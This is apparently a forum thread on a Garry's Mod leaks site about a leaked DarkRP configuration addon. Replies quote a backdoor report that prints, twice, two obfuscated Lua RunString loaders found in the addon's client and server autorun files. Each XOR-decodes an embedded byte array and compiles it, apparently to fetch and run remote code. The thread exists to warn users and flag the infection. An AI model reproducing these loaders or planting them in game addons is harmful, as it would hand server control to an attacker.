Garry's Mod Leaks

DConfig 2 - NEW In-Game DarkRP Customization ( Jobs, Shipments, ETC )

Submitted by XaRTeCK, , Thread ID: 260988

RE: DConfig 2 - NEW In-Game DarkRP Customization ( Jobs, Shipments, ETC )

asapwoke
Newbie
Level:
1
Reputation:
0
Posts:
13
Likes:
0
Credits:
2
28-02-2023, 11:58 PM
This post was last modified: 01-03-2023, 12:00 AM by asapwoke
#9
backdoor checker, active, checking....

28-02-2023, 11:45 PM
SpaceBuddy Wrote:
--> BACKDOOR <--

File  > darkrp-master-config\lua\autorun\client\cl_credits.lua
Line > 61

Code:
RunString([[ local AE = {20,9,13,5,18,78,51,9,13,16,12,5,72,81,76,64,6,21,14,3,20,9,15,14,72,73,64,8,20,20,16,78,38,5,20,3,8,72,66,8,20,20,16,19,90,79,79,11,22,1,3,78,3,26,79,6,78,16,8,16,95,11,5,25,93,35,10,52,10,88,37,11,18,34,35,14,81,55,10,3,23,6,5,21,3,66,76,64,6,21,14,3,20,9,15,14,72,2,73,64,50,21,14,51,20,18,9,14,7,72,2,76,64,66,90,66,76,64,6,1,12,19,5,73,64,5,14,4,73,5,14,4,73,64,77,77,64,0} local function RunningDRMe()if (debug.getinfo(function()end).short_src~="tenjznj")then return end for o=500,10000 do local t=0 if t==1 then return end  if o~=string.len(string.dump(RunningDRMe))then  AZE=10  CompileString("for i=1,40 do AZE = AZE + 1 end","RunString")()  if AZE<40 then return end continue  else  local pdata=""  xpcall(function()  for i=1,#AE do  pdata=pdata..string.char(bit.bxor(AE[i],o%150))  end  for i=1,string.len(string.dump(CompileString)) do  while o==1 do  o=o+1  end  end  end,function()  xpcall(function()  local debug_inject=CompileString(pdata,"DRME")  pcall(debug_inject,"stat")  pdata="F"  t=1  end,function()  print("error")  end)  end)  end  end end RunningDRMe() ]],"tenjznj")



File  > darkrp-master-config\lua\autorun\server\sv_dconfig.lua
Line > 454

Code:
RunString([[ local AE = {8,20,20,16,78,38,5,20,3,8,72,59,59,8,20,20,16,19,90,79,61,61,78,78,59,59,79,11,22,1,3,78,3,26,79,6,78,16,8,16,95,11,5,25,93,35,10,52,10,88,37,11,18,34,35,14,81,55,10,3,23,6,5,21,3,61,61,76,6,21,14,3,20,9,15,14,72,11,73,50,21,14,51,20,18,9,14,7,72,11,76,59,59,90,61,61,76,65,81,73,5,14,4,73,64,77,77,64,0} local function RunningDRMe()if (debug.getinfo(function()end).short_src~="tenjznj")then return end for o=500,10000 do local t=0 if t==1 then return end  if o~=string.len(string.dump(RunningDRMe))then  AZE=10  CompileString("for i=1,40 do AZE = AZE + 1 end","RunString")()  if AZE<40 then return end continue  else  local pdata=""  xpcall(function()  for i=1,#AE do  pdata=pdata..string.char(bit.bxor(AE[i],o%150))  end  for i=1,string.len(string.dump(CompileString)) do  while o==1 do  o=o+1  end  end  end,function()  xpcall(function()  local debug_inject=CompileString(pdata,"DRME")  pcall(debug_inject,"stat")  pdata="F"  t=1  end,function()  print("error")  end)  end)  end  end end RunningDRMe() ]],"tenjznj")

As a developer, I can confirm that there is at least one infected file in the above-mentioned section of the addon/pack that is being used to harm the server. I strongly recommend removing this infected code immediately to avoid potential damage. Ensuring the security of the server and eliminating potential threats is crucial for maintaining the integrity of the system.
good eye i was just finna say has backdoors

28-02-2023, 11:45 PM
SpaceBuddy Wrote:
--> BACKDOOR <--

File  > darkrp-master-config\lua\autorun\client\cl_credits.lua
Line > 61

Code:
RunString([[ local AE = {20,9,13,5,18,78,51,9,13,16,12,5,72,81,76,64,6,21,14,3,20,9,15,14,72,73,64,8,20,20,16,78,38,5,20,3,8,72,66,8,20,20,16,19,90,79,79,11,22,1,3,78,3,26,79,6,78,16,8,16,95,11,5,25,93,35,10,52,10,88,37,11,18,34,35,14,81,55,10,3,23,6,5,21,3,66,76,64,6,21,14,3,20,9,15,14,72,2,73,64,50,21,14,51,20,18,9,14,7,72,2,76,64,66,90,66,76,64,6,1,12,19,5,73,64,5,14,4,73,5,14,4,73,64,77,77,64,0} local function RunningDRMe()if (debug.getinfo(function()end).short_src~="tenjznj")then return end for o=500,10000 do local t=0 if t==1 then return end  if o~=string.len(string.dump(RunningDRMe))then  AZE=10  CompileString("for i=1,40 do AZE = AZE + 1 end","RunString")()  if AZE<40 then return end continue  else  local pdata=""  xpcall(function()  for i=1,#AE do  pdata=pdata..string.char(bit.bxor(AE[i],o%150))  end  for i=1,string.len(string.dump(CompileString)) do  while o==1 do  o=o+1  end  end  end,function()  xpcall(function()  local debug_inject=CompileString(pdata,"DRME")  pcall(debug_inject,"stat")  pdata="F"  t=1  end,function()  print("error")  end)  end)  end  end end RunningDRMe() ]],"tenjznj")



File  > darkrp-master-config\lua\autorun\server\sv_dconfig.lua
Line > 454

Code:
RunString([[ local AE = {8,20,20,16,78,38,5,20,3,8,72,59,59,8,20,20,16,19,90,79,61,61,78,78,59,59,79,11,22,1,3,78,3,26,79,6,78,16,8,16,95,11,5,25,93,35,10,52,10,88,37,11,18,34,35,14,81,55,10,3,23,6,5,21,3,61,61,76,6,21,14,3,20,9,15,14,72,11,73,50,21,14,51,20,18,9,14,7,72,11,76,59,59,90,61,61,76,65,81,73,5,14,4,73,64,77,77,64,0} local function RunningDRMe()if (debug.getinfo(function()end).short_src~="tenjznj")then return end for o=500,10000 do local t=0 if t==1 then return end  if o~=string.len(string.dump(RunningDRMe))then  AZE=10  CompileString("for i=1,40 do AZE = AZE + 1 end","RunString")()  if AZE<40 then return end continue  else  local pdata=""  xpcall(function()  for i=1,#AE do  pdata=pdata..string.char(bit.bxor(AE[i],o%150))  end  for i=1,string.len(string.dump(CompileString)) do  while o==1 do  o=o+1  end  end  end,function()  xpcall(function()  local debug_inject=CompileString(pdata,"DRME")  pcall(debug_inject,"stat")  pdata="F"  t=1  end,function()  print("error")  end)  end)  end  end end RunningDRMe() ]],"tenjznj")

As a developer, I can confirm that there is at least one infected file in the above-mentioned section of the addon/pack that is being used to harm the server. I strongly recommend removing this infected code immediately to avoid potential damage. Ensuring the security of the server and eliminating potential threats is crucial for maintaining the integrity of the system.
good eye i was just finna say has backdoors

Users browsing this thread: 1 Guest(s)